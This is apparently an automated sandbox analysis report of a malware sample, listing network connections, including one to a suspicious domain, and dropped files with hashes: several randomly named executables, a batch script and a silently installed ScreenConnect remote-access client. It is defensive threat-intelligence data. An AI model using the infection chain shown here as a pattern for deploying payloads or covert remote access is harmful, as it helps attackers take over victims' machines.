US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
NL 142.251.36.46:443 youtube.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
NL 216.58.208.110:443 youtube-ui.l.google.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 172.67.137.158:443 disobilittyhell.live tcp
NL 216.58.208.110:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
NL 172.217.23.206:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
NL 172.217.23.206:443 consent.youtube.com udp
US 8.8.8.8:53 www.google.com udp
NL 172.217.168.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
NL 172.217.168.196:443 www.google.com udp
N/A 127.0.0.1:59507 tcp
N/A 127.0.0.1:59515 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
NL 142.250.179.174:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
NL 142.250.179.174:443 redirector.gvt1.com udp
US 8.8.8.8:53 r3---sn-aigzrnsl.gvt1.com udp
GB 74.125.168.232:443 r3---sn-aigzrnsl.gvt1.com tcp
US 8.8.8.8:53 r3.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 r3.sn-aigzrnsl.gvt1.com udp
GB 74.125.168.232:443 r3.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.152.202:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.152.202:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.190.72.216:443 location.services.mozilla.com udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe

MD5 30e223a129babc795c38e7b6bb3ee202
SHA1 99ac334d2de4224b19212f16922babfc0b424d92
SHA256 a971b93985a01d792963c3a7635eb2905487ba7dcf2623a4361907e1e82dcafe
SHA512 e6e8eda28fc4c8359426749b9bd3ec51c5ea062b35349c4db6a1235cbbebcf41d947573961e85355468538fae3fa767d03de16b388ac18ba4b9ac8c08c2d7fec

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe

MD5 a92d6465d69430b38cbc16bf1c6a7210
SHA1 421fadebee484c9d19b9cb18faf3b0f5d9b7a554
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
SHA512 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe

MD5 9e3110a7e155297b4a8b2324c31147d2
SHA1 cffe1b51d8579cefd79a74df881ac5529555525b
SHA256 5785fdaa656a4cb5b6fd42f528be1c3326ed92696b4c6e176779a5d4d2cc883f
SHA512 9cd222acd97169febeb98990fbae502aa99aade0f9b981ba8cd88f2c7a8b22a2cfcf3909f432a8ad532fdd19d4d4eb863b890460e15792a6fa4229dc762377e3

memory/2292-27-0x0000000000EB0000-0x00000000011B4000-memory.dmp

memory/2292-30-0x0000000000EB0000-0x00000000011B4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe

MD5 977cb8c87f5af026b73fde1dc4b75a0e
SHA1 8b5bb58ca523b459afbb469bc1fedc0aebb1155f
SHA256 1e068af2dd82efea11c6eaffb036901f5653fd63133ca8e99ff3e62d7dd403a2
SHA512 43145a48cbf389fd96c386a3fdb238b2105a6b629284802ccc4b4029bc9e1e6d1d9d031c6452ae9f26f3b19db97ee0fe400a6d28135c2bd4f1378b1e8ab69f5e

memory/4680-34-0x00000000007F0000-0x0000000000E99000-memory.dmp

memory/4680-35-0x00000000007F0000-0x0000000000E99000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

MD5 75728febe161947937f82f0f36ad99f8
SHA1 d2b5a4970b73e03bd877b075bac0cdb3bfc510cf
SHA256 0a88c347a294b22b6d6554b711db339bca86c568863dec7844a2badec6ef4282
SHA512 7cfdf76b959895ae44abe4171662d9c6c28dfd444030d570fea0fa4f624adf226e35d655dd89b159a1e0d08bcd97dfe899c3646d7682aacf5f2dabfbdf3d9a67

memory/5052-53-0x00000000003B0000-0x000000000040C000-memory.dmp

memory/5052-54-0x0000000005260000-0x0000000005804000-memory.dmp

memory/1764-56-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1764-58-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe

MD5 32caa1d65fa9e190ba77fadb84c64698
SHA1 c96f77773845256728ae237f18a8cbc091aa3a59
SHA256 b5713079bc540d78a13d71edfe7387f97d771a3f30305a5b2978d77829ead3b1
SHA512 2dc5fe00b6536fc65f94baf71046bc3175eb1f5dec3969307aa5774601eb8fbfa24117e3e0adecd617ac2831c119bccb06e5b8b06b149075e06b76e921f71a60

memory/4088-76-0x0000000001120000-0x000000000117E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe

MD5 e4dbe59c82ca504abea3cd2edf1d88c2
SHA1 ffbb19f3f677177d1b424c342c234f7e54e698ad
SHA256 b95f594a74bc165d43b272512ad01abf01f9e3be43af99333acb971888f56edf
SHA512 137a3e3da2467631c924117e3ed8f53a249c2efc3ddad6453ac1c28b97cd19736d8fa3d4c9af1c328658c77740991c18f8808e55c5567bd21a2c2f6be4c8e65f

memory/4476-94-0x00000000029B0000-0x00000000029B8000-memory.dmp

memory/4476-95-0x00000000052E0000-0x00000000055D0000-memory.dmp

memory/4476-96-0x0000000004FE0000-0x000000000506C000-memory.dmp

memory/4476-97-0x0000000005090000-0x00000000050B2000-memory.dmp

memory/4476-98-0x00000000050B0000-0x000000000525C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi

MD5 aa58a0c608a2ec60555c011fe3788152
SHA1 39cb0cda4015b3dcc5e827a74f8f1f0b4e48cf0a
SHA256 564acb8e62d7ca9d440895bf347d8312fbfabb3d36eeacf247e115e766f499bd
SHA512 ff97035063141aa23a52c4b61c6e9585f66db2d6deed61b0a318e732790f4137af18fdf0fbd6e4648532da3f6a482046a183565cf3c0750101b13bc7d1763b77

C:\Users\Admin\AppData\Local\Temp\MSI7356.tmp

MD5 4abad4fd1a22bc922b457c28d1e40f1a
SHA1 fc5a486b121175b547f78d9b8fc82fd893fcf6ed
SHA256 db51e4b70f27d0bf28789ea3345bf693035916461d22661c26f149c5bc8891ed
SHA512 21d52ccf5b5041319a007f72c5cd5830f2a99e7b0ab2b946a87a25adebb78d6fbe1ff95a01f26e530a0d30d838560d8acf716e0c43aeb5ad69334a897456a5a1

C:\Users\Admin\AppData\Local\Temp\MSI7356.tmp-\Microsoft.Deployment.WindowsInstaller.dll

MD5 5ef88919012e4a3d8a1e2955dc8c8d81
SHA1 c0cfb830b8f1d990e3836e0bcc786e7972c9ed62
SHA256 3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d
SHA512 4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684

memory/4064-120-0x00000000052F0000-0x000000000531E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSI7356.tmp-\ScreenConnect.InstallerActions.dll

MD5 7572b9ae2ecf5946645863a828678b5a
SHA1 438a5be706775626768d24ba5f25c454920ad2f2
SHA256 d09447d4816e248c16891361d87019156cc7664b213357a8e6c422484b8d6b4e
SHA512 b1cee9458be3579a02b6f7e8d0b76f67a4b2d1f170db2e09af75d9901723e80e68650fe8fbbe43c8f062df7d50889e224b7cd9767027a0d7a5121a4534f2afa4

memory/4064-124-0x00000000052E0000-0x00000000052EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSI7356.tmp-\ScreenConnect.Core.dll

MD5 665a8c1e8ba78f0953bc87f0521905cc
SHA1 fe15e77e0aef283ced5afe77b8aecadc27fc86cf
SHA256 8377a87625c04ca5d511ceec91b8c029f9901079abf62cf29cf1134c99fa2662
SHA512 0f9257a9c51eb92435ed4d45e2eaaa0e2f12983f6912f6542cc215709ae853364d881f184687610f88332eca0f47e85fa339ade6b2d7f0f65adb5e3236a7b774

memory/4064-128-0x00000000053B0000-0x000000000543C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSI7356.tmp-\ScreenConnect.Windows.dll

MD5 7099c67fe850d902106c03d07bfb773b
SHA1 f597d519a59a5fd809e8a1e097fdd6e0077f72de
SHA256 2659f660691d65628d2fcc3bfc334686cd053f162cdb73bf7a0da0ac6449db92
SHA512 17849cb444d3ac2cd4658d4eca9dc89652beae6c6a2bd765749d8ba53e37248fd92a00af2b45371c21182135fffa6dd96dc9570bfd41459f23e084c3e122d162

memory/4064-132-0x00000000055F0000-0x000000000579C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe

MD5 971c0e70de5bb3de0c9911cf96d11743
SHA1 43badfc19a7e07671817cf05b39bc28a6c22e122
SHA256 67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d
SHA512 a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2

\??\Volume{24b92e62-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{566cb80c-3b7f-406c-ac21-d0d9bd3976d5}_OnDiskSnapshotProp

MD5 4059364f55df66d570c52a69e617ed53
SHA1 0210ed5e515fbfa03d8338d020c2cfc27d25326d
SHA256 4560ce301fa6588e2bee683022b4317e7c6796240fe541ecc29438fcfeace6fd
SHA512 06b47f7a8af140ddb7b8f928c95b3abd4e5a9177729513b2a70f406bd78a800881c954c77f7c4211fb6841d077c07d2f068b2a526d4c38e82e7b6c2c372c1968

C:\Windows\Installer\MSI9E5F.tmp

MD5 ba84dd4e0c1408828ccc1de09f585eda
SHA1 e8e10065d479f8f591b9885ea8487bc673301298
SHA256 3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
SHA512 7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

MD5 018f563275fa37ebb824d955d4d46937
SHA1 d26f82c1d267ae812beba9d4924824fbef10e474
SHA256 5bb4f11bf44af642b9014c44d9f959fd54a2eb2bd10c0521727d78fa2ca20d34
SHA512 6175019f8840db549342720286c95fc0409b5fab2ce023d2c5181534b8f7f87babd75fec9450508015672f7323731e231a6230186e30ca7804e2810668005f76

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe

MD5 d3e628c507dc331bab3de1178088c978
SHA1 723d51af347d333f89a6213714ef6540520a55c9
SHA256 ea1cfad9596a150beb04e81f84fa68f1af8905847503773570c901167be8bf39
SHA512 4b456466d1b60cda91a2aab7cb26bb0a63aaa4879522cb5d00414e54f6d2d8d71668b9e34dff1575cc5b4c92c61b9989abbe4b56a3e7869a41efcc45d23ca966

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll

MD5 ffedbac44fe3af839d5ae3c759806b2c
SHA1 71e48c88dfffe49c1c155181e760611c65f6ca50
SHA256 42e0add27d20e2393f9793197798ac7d374812a6dcd290b153f879a201e546af
SHA512 533d9284c15c2b0bf4b135fc7e55a04139d83065282fd4af54866b8b2b6966a0989d4ecf116b89a9b82d028ef446986aa1b92bb07b1521b1aef15ba286b75358

memory/3088-208-0x00000000044E0000-0x00000000044F8000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config

MD5 2744e91bb44e575ad8e147e06f8199e3
SHA1 6795c6b8f0f2dc6d8bd39f9cf971bab81556b290
SHA256 805e6e9447a4838d874d84e6b2cdff93723641b06726d8ee58d51e8b651cd226
SHA512 586edc48a71fa17cdf092a95d27fce2341c023b8ea4d93fa2c86ca9b3b3e056fd69bd3644edbad1224297bce9646419036ea442c93778985f839e14776f51498

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config

MD5 6e96a59674d968b35fe0ee2b8d04837e
SHA1 34deecda264c2c2f16fb394f3ad2f533e0d2dc7b
SHA256 b1637291c94844f98adf29f49137e56e6e94384d776effc4baec4148999104e8
SHA512 7eff2456e6a7d7cc92d2e8ae31011262b215253b2821eaf31f226d18b9b5714a2f668588198851925d538f2b554ec76a1ced7023f04ead2153b9ecb4a4dbf4d2

memory/3088-219-0x0000000004720000-0x0000000004770000-memory.dmp

memory/3088-223-0x0000000004770000-0x00000000047A6000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll

MD5 ff388e261fcb88bb2fb4295b4e84be66
SHA1 622e9b646881e4606a9a82d06e48329cfebe83aa
SHA256 8872211a8f4ff520d9d3342ed3841eb6fe42f6d83a0f639f6baf84795da99de2
SHA512 8d52b6fb173714f026df687064a20f42ac7c016ff9e41e941737d3a5159a0027d5acf420bc03f5bcde59cdb21586a77e491df26528b87b550e880cf7ab8a3929

memory/3088-224-0x0000000004A20000-0x0000000004AB2000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll

MD5 5adcb5ae1a1690be69fd22bdf3c2db60
SHA1 09a802b06a4387b0f13bf2cda84f53ca5bdc3785
SHA256 a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5
SHA512 812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

memory/3088-226-0x0000000004980000-0x00000000049C1000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll

MD5 41b8d757cbc2351fd9c0bf56aedede06
SHA1 10b528623a517c71956d0c50c4eba086988af615
SHA256 86432f33567ef172674fd7a828afa6a62e9d90efc8dba6199d803b0888d35e1b
SHA512 246f6d3a3ccee1c33713b564ff36e02a3bc594ad372deea9d7fb631f9f4f71fc5e5b0cc7f592b667ba5d731365a2b2992d3a95e434ae50fd58ba25e0d8be13a7

memory/3088-228-0x0000000004C00000-0x0000000004CD5000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources

MD5 d524e8e6fd04b097f0401b2b668db303
SHA1 9486f89ce4968e03f6dcd082aa2e4c05aef46fcc
SHA256 07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4
SHA512 e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources

MD5 dfd0bdff874bb29b508f15bdd35cb6a3
SHA1 de772d64129e084d150d8087ccdac16ef97fb185
SHA256 38bdcc2ec25e7464dde7293b5a6ec64eea4b9d9f6fb8c36fdcc5677a6f55b721
SHA512 6addfae10478871085c796f2af5a11cd78088fc49b245df2229db7546973ff9a16785c72bf61f569e16a3e79f7f48ef8c1badb91313271d9515af3d3b4b759b0

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources

MD5 11253402db9bbf80767d4b7c6db85ff9
SHA1 9e9f706703ecb0219e1fbe52fce7d74512cea174
SHA256 632fff03862ed945d5697279fa1e466025aa63d14b435cc50f44de316aa3250b
SHA512 9edf6df9e04e6c80619579200e33b3ac11b722fc3a94391af8ea44f1fbd00ad7180ef3898f7b23ace425da7a094be512cd744ac8fddd28e79eeb14d2b3359ee4

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources

MD5 5cd580b22da0c33ec6730b10a6c74932
SHA1 0b6bded7936178d80841b289769c6ff0c8eead2d
SHA256 de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c
SHA512 c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

MD5 afa993c978bc52d51e8af08a02892b4e
SHA1 6d92666ae52761ad1e6c5fbb8e1355354516bed7
SHA256 08efe3e41bd508e2e9c3f8cf4d466cb1c96c35c1b463e79f2a24ac031ab79b48
SHA512 d9d17361cb3c24f640086efd97f42b15b642917898879710d35b58f8f746b51936518fbde1f1fb45c1d524bcbeba74b4cbde7f32308af8cc7a8149a6eede18f2

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config

MD5 728175e20ffbceb46760bb5e1112f38b
SHA1 2421add1f3c9c5ed9c80b339881d08ab10b340e3
SHA256 87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077
SHA512 fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

memory/992-240-0x0000000002770000-0x00000000027A6000-memory.dmp

memory/992-239-0x0000000000530000-0x00000000005C6000-memory.dmp

memory/992-241-0x000000001B490000-0x000000001B51C000-memory.dmp

memory/992-242-0x000000001B6D0000-0x000000001B87C000-memory.dmp

C:\Config.Msi\e589d26.rbs

MD5 7ef355d62cef74c6475ceebe6b12a597
SHA1 b8a5be51ad4806f80e11ead5fbf18a52e1977f5b
SHA256 e20a9b0006c52bcca8e6ec4a74bca17809e980e2458eeacf71df9d86aaf500fa
SHA512 97235b8807b133f0b8dc6276c6848efa31d81feb812a2876a9cf612dff0cb3e09e3b1eadc6af25fd3fb001b63f7e9703994ed96579e981e49aebeb8a878102d7

memory/992-255-0x000000001CAC0000-0x000000001CC46000-memory.dmp

memory/992-258-0x0000000002740000-0x0000000002758000-memory.dmp

memory/992-259-0x00000000027D0000-0x00000000027E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

MD5 5487dcc2e2a5d7e109c3fd49f37a798b
SHA1 1ad449a9ef2e12d905e456f9b56f97a3d0544282
SHA256 b9be721252182d14fe65f1240fa16caa0238346b329fb6139e891f0c94c99ce5
SHA512 ee89ea43516275c73e9227dd6f26c2ceaf717928b9b376f65e891d9eb9110f6596d0c6e8f7bf78b51e0dc3a3acaba2c77d64d8b567b49943439c28344fb21845

memory/3340-267-0x00000188BA970000-0x00000188BA9C2000-memory.dmp

memory/3920-276-0x00000000002D0000-0x0000000000440000-memory.dmp

memory/3340-278-0x00000188BAA80000-0x00000188BAA92000-memory.dmp

memory/3340-279-0x00000188BAC00000-0x00000188BAC3C000-memory.dmp

memory/3340-277-0x00000188D4800000-0x00000188D490A000-memory.dmp

memory/3340-281-0x00007FF632000000-0x00007FF6321AE000-memory.dmp

memory/3340-285-0x00000188D4CE0000-0x00000188D4EA2000-memory.dmp

memory/3340-286-0x00000188D53E0000-0x00000188D5908000-memory.dmp

memory/3340-287-0x00000188D46F0000-0x00000188D4740000-memory.dmp

memory/30656-303-0x00007FF79DED0000-0x00007FF79E07E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10033420101\7axE6Jz.exe

MD5 ab118fd9c6e1c3813ff0ec7cd8c6539f
SHA1 a03967883de5cfbe96036d13eac74bbb030903ef
SHA256 57153e88e47ac7b13751e8382e021cad96481f68bfa41510ed5b402adbecd7ad
SHA512 4b119738f8843025fe8c158c02a32c1e147fdbce41671c80ef58f1daec3f555fbe0248ed7174cfdebce0c5c987b616824288e3246953a79910a5504bf27fc297

memory/47720-320-0x00000000001A0000-0x0000000000208000-memory.dmp

memory/47916-323-0x0000000000400000-0x000000000045E000-memory.dmp

memory/47916-322-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe

MD5 139801ec12921d4a10cade0e8bd14581
SHA1 19e4ea0a6204a9256bb2671aec86b1942d0bb63c
SHA256 8a32ddf6678734e654e2c128673789991b08f31d4c0049f168774f0b056a2796
SHA512 2d6c0a6923b278d648b20f3091cabdf889f5ae7e767675c8eb93fb23f607b1e6cb8ea891bf827932efa78dddddb32671045d2e52adac73ff764c7286bc542601

memory/110836-341-0x00000000014C0000-0x000000000151F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035810101\4284dc1285.exe

MD5 454bd2cde5257315f133cfc64bcd0351
SHA1 ccfb541cc802100b3d0bc4c4147bf0363675be2b
SHA256 61a5dd7249aa43b42abc2ce22d7937dc68c7c3748d20784cb86dd7135080d580
SHA512 da676aed2ed94912d7a8d84c670d6c49a91a3bd932cf88bfa141e8db16c358c64ecaa561ca34f53f9ead0e4fdbdd534aa380edba700f2582c9606a4ab270838f

memory/129624-361-0x0000000002BB0000-0x0000000002BE6000-memory.dmp

memory/129624-362-0x00000000054F0000-0x0000000005B18000-memory.dmp

memory/129624-365-0x0000000005B90000-0x0000000005BF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tfdb2j4d.kvx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/129624-364-0x0000000005260000-0x00000000052C6000-memory.dmp

memory/129624-363-0x00000000050C0000-0x00000000050E2000-memory.dmp

memory/129624-375-0x0000000005C00000-0x0000000005F54000-memory.dmp

memory/129624-376-0x0000000006190000-0x00000000061AE000-memory.dmp

memory/129624-377-0x00000000061E0000-0x000000000622C000-memory.dmp

memory/129624-380-0x00000000066D0000-0x00000000066EA000-memory.dmp

memory/129624-379-0x0000000007AD0000-0x000000000814A000-memory.dmp

memory/129624-382-0x0000000007670000-0x0000000007706000-memory.dmp

memory/129624-383-0x0000000007600000-0x0000000007622000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

memory/138956-402-0x00000000060C0000-0x0000000006414000-memory.dmp

memory/138956-412-0x00000000067A0000-0x00000000067EC000-memory.dmp

memory/140112-424-0x0000000006110000-0x000000000615C000-memory.dmp

memory/142248-445-0x0000000006820000-0x000000000686C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe

MD5 4c3d80aa96c22ae2f7b01a904aef5ba0
SHA1 5a4fe29daf45ada28b3a03a8284dcd098d935942
SHA256 67ff99a32813cf55f119ca58c82c508a4d2d4e535fcc653fda16df801681299f
SHA512 a372cb16a04d2540802ebcfb70c731097c44ae0b9e09d7b161fda8b73d4d4b11194de0c8cb60b2d05a86140b9f4d8258125564678574fa0182e944b5ac93d204

memory/144556-466-0x0000000000650000-0x0000000000B2E000-memory.dmp

memory/145836-476-0x0000000000270000-0x000000000074E000-memory.dmp

memory/144556-478-0x0000000000650000-0x0000000000B2E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe

MD5 b5001d168ba5139846f2848c8e05a6ee
SHA1 080f353ab857f04ea65b78570bfa998d1e421ea2
SHA256 059e600a06b4b6671fa440728b932adff7d246441bf328fcc4a8e29d4df11a23
SHA512 d608f6f4ed7de73308ab7b231b343d5a832b2c0a68b0d0522d2df4c4a8cc15e12685b2ffcb8232b58b4c519979e4307179964fa4011752288f63f72090828143

memory/160076-491-0x0000000000400000-0x000000000087F000-memory.dmp

memory/145836-507-0x0000000000270000-0x000000000074E000-memory.dmp

memory/166548-508-0x0000000000AF0000-0x0000000000DF4000-memory.dmp

memory/166548-511-0x0000000000AF0000-0x0000000000DF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036500101\325e33a3f3.exe

MD5 c0de6fd5072e5af19dc57d131b1b0138
SHA1 d8680c639b0f2bd288c61896a9dfce9f1b49bc56
SHA256 9e74ed79de88b2c8aedc0578e3c8cf96ffb908d72a641a72205de6c2a766aaa4
SHA512 60cf165679f2103c2945dcf8a3ddbeca604556c62c2f5821c1f11175aaf44c3b4896542b6c5f25f7dceb29d0959d6f71b578748111522d1fd1021758f6ae9e77

memory/160076-527-0x0000000000400000-0x000000000087F000-memory.dmp

memory/160076-528-0x0000000000400000-0x000000000087F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\pending_pings\bde789b2-f6b8-44e0-b904-f020b2bd97df

MD5 86f2067cd589c6f38624d3043a67f97e
SHA1 82ac3272fd92470d8451af73d47e4260941979df
SHA256 4f66563b669936192658db692a7db5afcae432981e7cccdcb6c2b418d0196f19
SHA512 87804b3da7d8b8143d7c9a8859582d2e7394a1867f118e01dfb54edfe6282ef21ac92662e05f870e62bbf1fb298818940f6b3a7330bae0b9181101c633995d92

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.tmp

MD5 1f74f1ff867c402d534cf3a1a9305a41
SHA1 88f3633f2b82bee6e86134315998e8ce3cd655f6
SHA256 c64b504fe346b04ed46d9c2484cb40f2144b17e932a2b6e6f012dffcffc37629
SHA512 6edf504d4fcea71d1b26397f4bcfbee13208143257c66c4fb1bfbc58b36978957afedfbda8c9738ac65630fccd4c701c4e84e0ce12515541c59820a138ecad65

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\prefs.js

MD5 a2bd9c84412f5b31fade1e211950a0c0
SHA1 a4c315d4eb5cfca7a9163365924f6e9aa83d24a9
SHA256 5f4ca500f2a88d8562c34fd0bec54244f7dfb8e3b0029a62f61d80f992d595fe
SHA512 d7cf8b7429548da8fd70f2691ef94d67b73fe527acdb38b3f21a1de1137bb0f6e08c6f5021c329b1abc17955f9e30c07c79ec9082c92d40413801e8cf2c7bf0b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\AlternateServices.bin

MD5 3c6370ff5a38e4650881368ff0825443
SHA1 953b8cd8764364cd093a063d4d9b5730863f4a0f
SHA256 21f4b2a509530ddee0813f3da97192f234823cdffc2024f447c15deca61aa7c4
SHA512 bf55812e03fe4e04fbdff86f58d62bdab1046be7faff75fe2f1acf3cd60d1b0b02b41fd2013fd1c8d0b7bdcc79ccbe12e644da1771d9aef170ad32c49a2b2fa4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\prefs-1.js

MD5 7265ba0b5a8d48c93f863f91f3b83626
SHA1 4d3f6dee8c82c39a545813932f0d9c1c06f0cf96
